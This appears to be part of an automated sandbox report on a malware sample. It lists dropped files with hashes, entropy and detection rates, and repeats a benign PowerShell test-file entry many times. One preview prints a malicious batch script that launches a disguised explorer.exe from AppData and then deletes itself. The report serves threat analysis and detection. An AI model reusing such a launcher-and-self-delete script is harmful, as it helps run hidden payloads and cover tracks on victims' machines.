                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):186
                                                      Entropy (8bit):5.102181105778648
                                                      Encrypted:false
                                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQC/iEaKC5SufA0XvbBktKcKZG1N+E2J5xAIVQ:hCRLuVFOOr+DE1WD5SaZ5Sub/bKOZG1v
                                                      MD5:CC97FBB648FE5B389D5CFB586479881D
                                                      SHA1:FD616E963DAFA7CD2946F11CDB35B12E650D23E6
                                                      SHA-256:83D0307CB2A742B36C6B175028AD537E7C3B6AF10FABC420496C431E264EE4B8
                                                      SHA-512:9000F82418DADC4EAA636729F5BD2E9ACCFDB1CE1266210298F19CEE5305DF8958D2290BFC147584EFB2C3BAC9E4B4F65C54A4F9D855E9EBA974D2410343F442
                                                      Malicious:true
                                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qWYjuUdv6Q.bat"
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):69632
                                                      Entropy (8bit):5.932541123129161
                                                      Encrypted:false
                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                      Joe Sandbox View:
                                                      • Filename: 0wdppTE7Op.exe, Detection: malicious
                                                      • Filename: JNKHlxGvw4.exe, Detection: malicious
                                                      • Filename: xoCq1tvPcm.exe, Detection: malicious
                                                      • Filename: Dfim58cp4J.exe, Detection: malicious
                                                      • Filename: KyC6hVwU8Z.exe, Detection: malicious
                                                      • Filename: 4si9noTBNw.exe, Detection: malicious
                                                      • Filename: eu6OEBpBCI.exe, Detection: malicious
                                                      • Filename: IYXE4Uz61k.exe, Detection: malicious
                                                      • Filename: file.exe, Detection: malicious
                                                      • Filename: FToZAUe1tw.exe, Detection: malicious
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):39936
                                                      Entropy (8bit):5.660491370279985
                                                      Encrypted:false
                                                      SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                      MD5:240E98D38E0B679F055470167D247022
                                                      SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                      SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                      SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32256
                                                      Entropy (8bit):5.631194486392901
                                                      Encrypted:false
                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):23552
                                                      Entropy (8bit):5.529329139831718
                                                      Encrypted:false
                                                      SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                      MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                      SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                      SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                      SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):69632
                                                      Entropy (8bit):5.932541123129161
                                                      Encrypted:false
                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32768
                                                      Entropy (8bit):5.645950918301459
                                                      Encrypted:false
                                                      SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                      MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                      SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                      SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                      SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32768
                                                      Entropy (8bit):5.645950918301459
                                                      Encrypted:false
                                                      SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                      MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                      SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                      SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                      SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):34816
                                                      Entropy (8bit):5.636032516496583
                                                      Encrypted:false
                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):36352
                                                      Entropy (8bit):5.668291349855899
                                                      Encrypted:false
                                                      SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                      MD5:94DA5073CCC14DCF4766DF6781485937
                                                      SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                      SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                      SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):41472
                                                      Entropy (8bit):5.6808219961645605
                                                      Encrypted:false
                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):70144
                                                      Entropy (8bit):5.909536568846014
                                                      Encrypted:false
                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
